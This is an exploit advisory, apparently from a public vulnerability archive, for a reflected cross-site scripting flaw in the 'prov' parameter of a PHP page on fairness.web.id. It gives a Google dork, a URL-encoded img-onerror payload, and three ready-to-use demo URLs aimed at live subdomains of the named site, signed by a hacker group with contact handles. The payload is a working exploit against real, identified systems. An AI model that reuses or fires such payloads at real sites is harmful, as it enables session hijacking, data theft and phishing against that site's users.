Fairness Web ID - Cross Site Scripting

2020.11.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################# # Exploit Title: Fairness Web ID - Cross Site Scripting # Google Dork: site:fairness.web.id # Date: 2020-11-07 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: fairness.web.id # Software Version: * # Software Link: N/A # Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Exploit: ============ _a.php?_a=desa-kecamatan-kota&tanda=kota&prov=%22%3E%3Cimg%20src=x%20onerror=prompt(%27Gh05t666nero%27,domain);%3E ############################################################# [*] Demo: ========= http://m.fairness.web.id/_a.php?_a=desa-kecamatan-kota&tanda=kota&prov=%22%3E%3Cimg%20src=x%20onerror=prompt(%27Gh05t666nero%27,domain);%3E http://m.tugang-village.fairness.web.id/_a.php?_a=desa-kecamatan-kota&tanda=kota&prov=%22%3E%3Cimg%20src=x%20onerror=prompt('Gh05t666nero',domain);%3E http://m.nusantara.fairness.web.id/_a.php?_a=desa-kecamatan-kota&tanda=kota&prov=%22%3E%3Cimg%20src=x%20onerror=prompt(%27Gh05t666nero%27,domain);%3E ############################################################# [*] Contact: ============ # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top